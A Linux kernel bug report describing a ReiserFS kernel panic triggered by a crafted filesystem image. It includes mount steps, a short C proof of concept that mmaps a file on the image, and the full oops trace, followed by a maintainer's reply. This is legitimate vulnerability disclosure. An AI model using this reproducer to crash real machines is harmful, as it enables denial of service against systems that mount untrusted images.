Bug 200361

Summary: Kernel panic in update_stat_data() when accessing a file on a reiserfs filesystem
Product: File System Reporter: Wen Xu (wen.xu)
Component: ReiserFS    Assignee: ReiserFS developers team (reiserfs-devel)
Status: NEW ---    
Severity: normal CC: jeffm, wen.xu
Priority: P1    
Hardware: All   
OS: Linux   
Kernel Version: 4.18 Subsystem:
Regression: No Bisected commit-id:
Attachments: The (compressed) crafted image which causes crash

Description Wen Xu 2018-06-28 21:06:08 UTC
Created attachment 277015 [details]
The (compressed) crafted image which causes crash

- Reproduce 
# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 31.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
    #define _GNU_SOURCE
    #include <sys/types.h>
    #include <sys/mount.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <sys/xattr.h>

    #include <dirent.h>
    #include <errno.h>
    #include <error.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #include <linux/falloc.h>
    #include <linux/loop.h>

  
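    /*
     * Reproducer step: open <mpoint>/foo/bar/baz read-only and mmap its
     * first page.  On the crafted image the mmap() path alone is enough:
     * generic_file_mmap() -> touch_atime() -> reiserfs_dirty_inode() ->
     * reiserfs_update_sd_size() reaches the vs-13065 panic in
     * update_stat_data() (see the kernel message below).
     *
     * mpoint: mount point of the crafted image (argv[1]).
     *
     * The path string is allocated by asprintf() and freed before
     * returning; failures to build the path or open the file are reported
     * on stderr instead of being silently ignored.
     */
    static void activity(char *mpoint) {
      char *foo_bar_baz = NULL;

      /* asprintf() leaves the pointer undefined on failure, so check it
       * before passing the result to open(). */
      if (asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint) < 0) {
        perror("asprintf");
        return;
      }

      int fd = open(foo_bar_baz, O_RDONLY, 0);
      if (fd >= 0) {
        /* MAP_POPULATE pre-faults the page; the trace shows the panic is
         * already reached inside the mmap() syscall itself. */
        void *mem = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_POPULATE, fd, 0);
        if (mem != MAP_FAILED)
          munmap(mem, 4096);
        close(fd);
      } else {
        /* Most likely a wrong mount point; say which path failed. */
        perror(foo_bar_baz);
      }

      free(foo_bar_baz);
    }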

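    /*
     * Entry point of the reproducer.  argv[1] is the mount point of the
     * crafted image (the "./mnt" argument in the Reproduce steps above).
     *
     * Returns 0 after running the activity, 1 when no mount point was
     * given (the original dereferenced a NULL argv[1] in that case).
     */
    int main(int argc, char *argv[]) {
      if (argc < 2) {
        fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
        return 1;
      }
      activity(argv[1]);
      return 0;
    }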

- Kernel message
[  949.720812] REISERFS (device loop0): found reiserfs format "3.6" with standard journal
[  949.720899] REISERFS (device loop0): using ordered data mode
[  949.720905] reiserfs: using flush barriers
[  949.724305] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30
[  949.727088] REISERFS (device loop0): checking transaction log (loop0)
[  950.557910] REISERFS (device loop0): Using r5 hash to sort names
[  950.558231] REISERFS (device loop0): Created .reiserfs_priv - reserved for xattr storage.
[  967.052214] REISERFS panic (device loop0): vs-13065 update_stat_data: key [5 15 0x0 SD], found item *3.5*[5 15 0x0 IND], item_len 8, item_location 2972, free_space(entry_count) 0
[  967.052279] ------------[ cut here ]------------
[  967.052282] kernel BUG at fs/reiserfs/prints.c:369!
[  967.059616] invalid opcode: 0000 [#1] SMP KASAN PTI
[  967.060669] CPU: 0 PID: 1429 Comm: a.out Not tainted 4.18.0-rc1+ #8
[  967.061944] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  967.063902] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  967.064864] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21
[  967.068599] RSP: 0018:ffff8801efa77760 EFLAGS: 00010282
[  967.069671] RAX: 00000000000000a6 RBX: ffffffffa693af60 RCX: 0000000000000000
[  967.071092] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003df4eee2
[  967.072513] RBP: ffff8801efa77810 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  967.073948] R10: 0000000000000001 R11: ffffed003edc4f20 R12: ffff8801ee98e600
[  967.075367] R13: ffffffffa693b980 R14: ffff8801cd360000 R15: ffff8801cd3601c8
[  967.076797] FS:  00007f88c4a10700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  967.078394] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  967.079537] CR2: 00007f88c44c1760 CR3: 00000001f136c000 CR4: 00000000000006f0
[  967.080980] Call Trace:
[  967.081504]  ? reiserfs_debug+0x10/0x10
[  967.082289]  reiserfs_update_sd_size+0x44f/0x590
[  967.083227]  ? make_le_item_head+0x130/0x130
[  967.084133]  ? mutex_unlock+0x22/0x40
[  967.084903]  ? do_journal_begin_r+0x46c/0x6d0
[  967.085789]  ? journal_begin+0x10f/0x1e0
[  967.086585]  reiserfs_dirty_inode+0x149/0x160
[  967.087465]  ? reiserfs_dirty_inode+0x149/0x160
[  967.088383]  ? reiserfs_unfreeze+0x70/0x70
[  967.089254]  ? timespec64_trunc+0x5c/0x90
[  967.090072]  ? timespec64_trunc+0x5c/0x90
[  967.090902]  __mark_inode_dirty+0x220/0x4f0
[  967.091754]  ? timespec64_trunc+0x90/0x90
[  967.092571]  generic_update_time+0xd7/0x170
[  967.093435]  touch_atime+0x164/0x190
[  967.094169]  ? __atime_needs_update+0x360/0x360
[  967.095101]  ? kasan_kmalloc+0xad/0xe0
[  967.095891]  generic_file_mmap+0x80/0x90
[  967.096702]  mmap_region+0x5dc/0x8d0
[  967.097449]  do_mmap+0x543/0x790
[  967.098126]  vm_mmap_pgoff+0x182/0x1f0
[  967.098896]  ? vma_is_stack_for_current+0x60/0x60
[  967.099852]  ? putname+0x80/0x90
[  967.100518]  ? __fget+0xbe/0x110
[  967.101202]  ksys_mmap_pgoff+0x2a9/0x3a0
[  967.102011]  ? find_mergeable_anon_vma+0x60/0x60
[  967.102964]  ? filp_open+0x60/0x60
[  967.103666]  ? vm_brk+0x20/0x20
[  967.104338]  __x64_sys_mmap+0x94/0xb0
[  967.105115]  do_syscall_64+0x78/0x170
[  967.105868]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  967.106903] RIP: 0033:0x7f88c452c6ba
[  967.107631] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00
[  967.111428] RSP: 002b:00007ffdc414efb8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  967.112949] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f88c452c6ba
[  967.114365] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  967.115783] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[  967.117209] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[  967.118626] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[  967.120051] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  967.129773] ---[ end trace 2e85051acb5f6dc1 ]---
[  967.130773] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  967.131719] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21
[  967.135581] RSP: 0018:ffff8801efa77760 EFLAGS: 00010282
[  967.136638] RAX: 00000000000000a6 RBX: ffffffffa693af60 RCX: 0000000000000000
[  967.138147] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003df4eee2
[  967.139572] RBP: ffff8801efa77810 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  967.140988] R10: 0000000000000001 R11: ffffed003edc4f20 R12: ffff8801ee98e600
[  967.142435] R13: ffffffffa693b980 R14: ffff8801cd360000 R15: ffff8801cd3601c8
[  967.143851] FS:  00007f88c4a10700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  967.145453] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  967.146642] CR2: 00007f88c44c1760 CR3: 00000001f136c000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/inode.c#L1434
	if (!is_statdata_le_ih(ih))
		reiserfs_panic(inode->i_sb, "vs-13065", "key %k, found item %h",
			       INODE_PKEY(inode), ih);

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
Comment 1 Jeff Mahoney 2018-07-18 21:17:20 UTC
This is a panic due to reiserfs not having real error handling.  As reiserfs is in maintenance mode, this class is not on anyone's roadmap for fixing.